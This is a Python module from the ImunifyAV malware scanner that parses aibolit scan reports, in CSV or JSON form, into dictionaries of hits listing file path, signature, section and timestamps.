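"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
import base64
import binascii
import csv
import os
from collections import namedtuple
from contextlib import suppress
from pathlib import Path
from time import time

from . import AIBOLIT

EXTENDED_SUSPICIOUS = "extended-suspicious"

# Single-letter section code used by CSV reports -> section name used by
# JSON reports and by the hit dicts yielded below.
SECTIONS = {
    "p": "php_malware",
    "j": "js_malware",
    "s": "suspicious",
    "v": "vulners",
    "c": "cloudhash",
    "es": EXTENDED_SUSPICIOUS,
}

# Sections whose hits are flagged "suspicious" rather than confirmed malware.
SUSPICIOUS_SECTIONS = {"vulners", "suspicious", EXTENDED_SUSPICIOUS}

# One CSV report row, in column order.
AiBolitCSVReport = namedtuple(
    "AiBolitCSVReport",
    [
        "section",
        "path",
        "signature",
        "ctime",
        "mtime",
        "size",
        "etime",
        "signature_id",
        "hash",
        "signature_name",
        "sha256",
    ],
)


def _decode_path(file_name):
    """Return *file_name* decoded from base64 if it is valid base64, else unchanged.

    Reports carry file paths base64-encoded so arbitrary bytes in a name
    survive the report format. Decoding is best-effort: ``binascii.Error`` is
    a ``ValueError`` subclass, but ``b64decode`` raises a plain ``ValueError``
    for a ``str`` containing non-ASCII characters, so the wider type is
    suppressed to keep one non-encoded, non-ASCII path from aborting the
    whole report.

    Args:
        file_name: ``str`` or ``bytes`` path, possibly base64-encoded.

    Returns:
        The path as ``str`` (bytes go through ``os.fsdecode``, i.e. the
        filesystem encoding with surrogateescape; a ``str`` is returned as is).
    """
    with suppress(ValueError):
        file_name = base64.b64decode(file_name, validate=True)
    return os.fsdecode(file_name)


def parse_report_csv(report_path: Path):
    """Yield one hit dict per row of the aibolit CSV report at *report_path*.

    Blank lines (``csv.reader`` yields an empty list for them) and rows whose
    section code is not in ``SECTIONS`` are skipped. A row with the wrong
    number of columns raises ``TypeError`` from the namedtuple constructor.

    Args:
        report_path: path to the CSV report.

    Yields:
        dict with keys ``name``, ``file_name``, ``signature``, ``ctime``,
        ``modification_time``, ``suspicious``, ``size``, ``hash``,
        ``timestamp`` and ``extended_suspicious``.

    Raises:
        OSError: if the report cannot be opened.
        ValueError: if a numeric column cannot be converted.
    """
    with report_path.open(newline="") as report_stream:
        for raw_row in csv.reader(report_stream, delimiter=","):
            if not raw_row:
                continue
            row = AiBolitCSVReport(*raw_row)
            try:
                section = SECTIONS[row.section]
            except KeyError:
                continue
            sig = row.signature_name or "{}.{}".format(
                section, row.signature_id
            )
            # The vulners section carries no scan time ('etime'), so the
            # current time is used instead.
            timestamp = (
                int(float(row.etime)) if section != "vulners" else int(time())
            )
            yield {
                "name": AIBOLIT,
                "file_name": _decode_path(row.path),
                "signature": sig,
                "ctime": int(row.ctime),
                "modification_time": int(row.mtime),
                "suspicious": section in SUSPICIOUS_SECTIONS,
                "size": int(row.size or 0),
                "hash": row.sha256 or row.hash or None,
                "timestamp": timestamp,
                "extended_suspicious": section == EXTENDED_SUSPICIOUS,
            }


def parse_report_json(report, base64_path=True):
    """Yield one hit dict per entry of an already-parsed aibolit JSON *report*.

    Args:
        report: mapping of section name (see ``SECTIONS`` values) to a list
            of hit mappings with keys ``fn`` (file name), ``sigid``, ``sz``,
            ``ct``, ``mt`` and, except for vulners, ``et``; optional ``sn``,
            ``sha256`` and ``hash``.
        base64_path: when true, ``fn`` is treated as a base64-encoded path
            and decoded best-effort; otherwise it is used verbatim.

    Yields:
        dict with the same keys as ``parse_report_csv``.

    Raises:
        KeyError: if a hit lacks one of the required keys.
    """
    for section in SECTIONS.values():
        for hit in report.get(section, []):
            sig = hit.get("sn") or ".".join([section, str(hit["sigid"])])
            # vulners section does not provide timestamp ('et' field)
            # so current time is used instead.
            # 'et' - time when the file was scanned
            timestamp = (
                int(float(hit["et"])) if section != "vulners" else int(time())
            )
            file_name = hit["fn"]
            if base64_path:
                file_name = _decode_path(file_name)
            yield {
                "name": AIBOLIT,
                "file_name": file_name,
                "signature": sig,
                "suspicious": section in SUSPICIOUS_SECTIONS,
                "size": hit["sz"],
                "ctime": hit["ct"],
                "modification_time": hit["mt"],
                # 'hash' field is still used in 'cloudhash' section
                "hash": hit.get("sha256", hit.get("hash")),
                "timestamp": timestamp,
                "extended_suspicious": section == EXTENDED_SUSPICIOUS,
            }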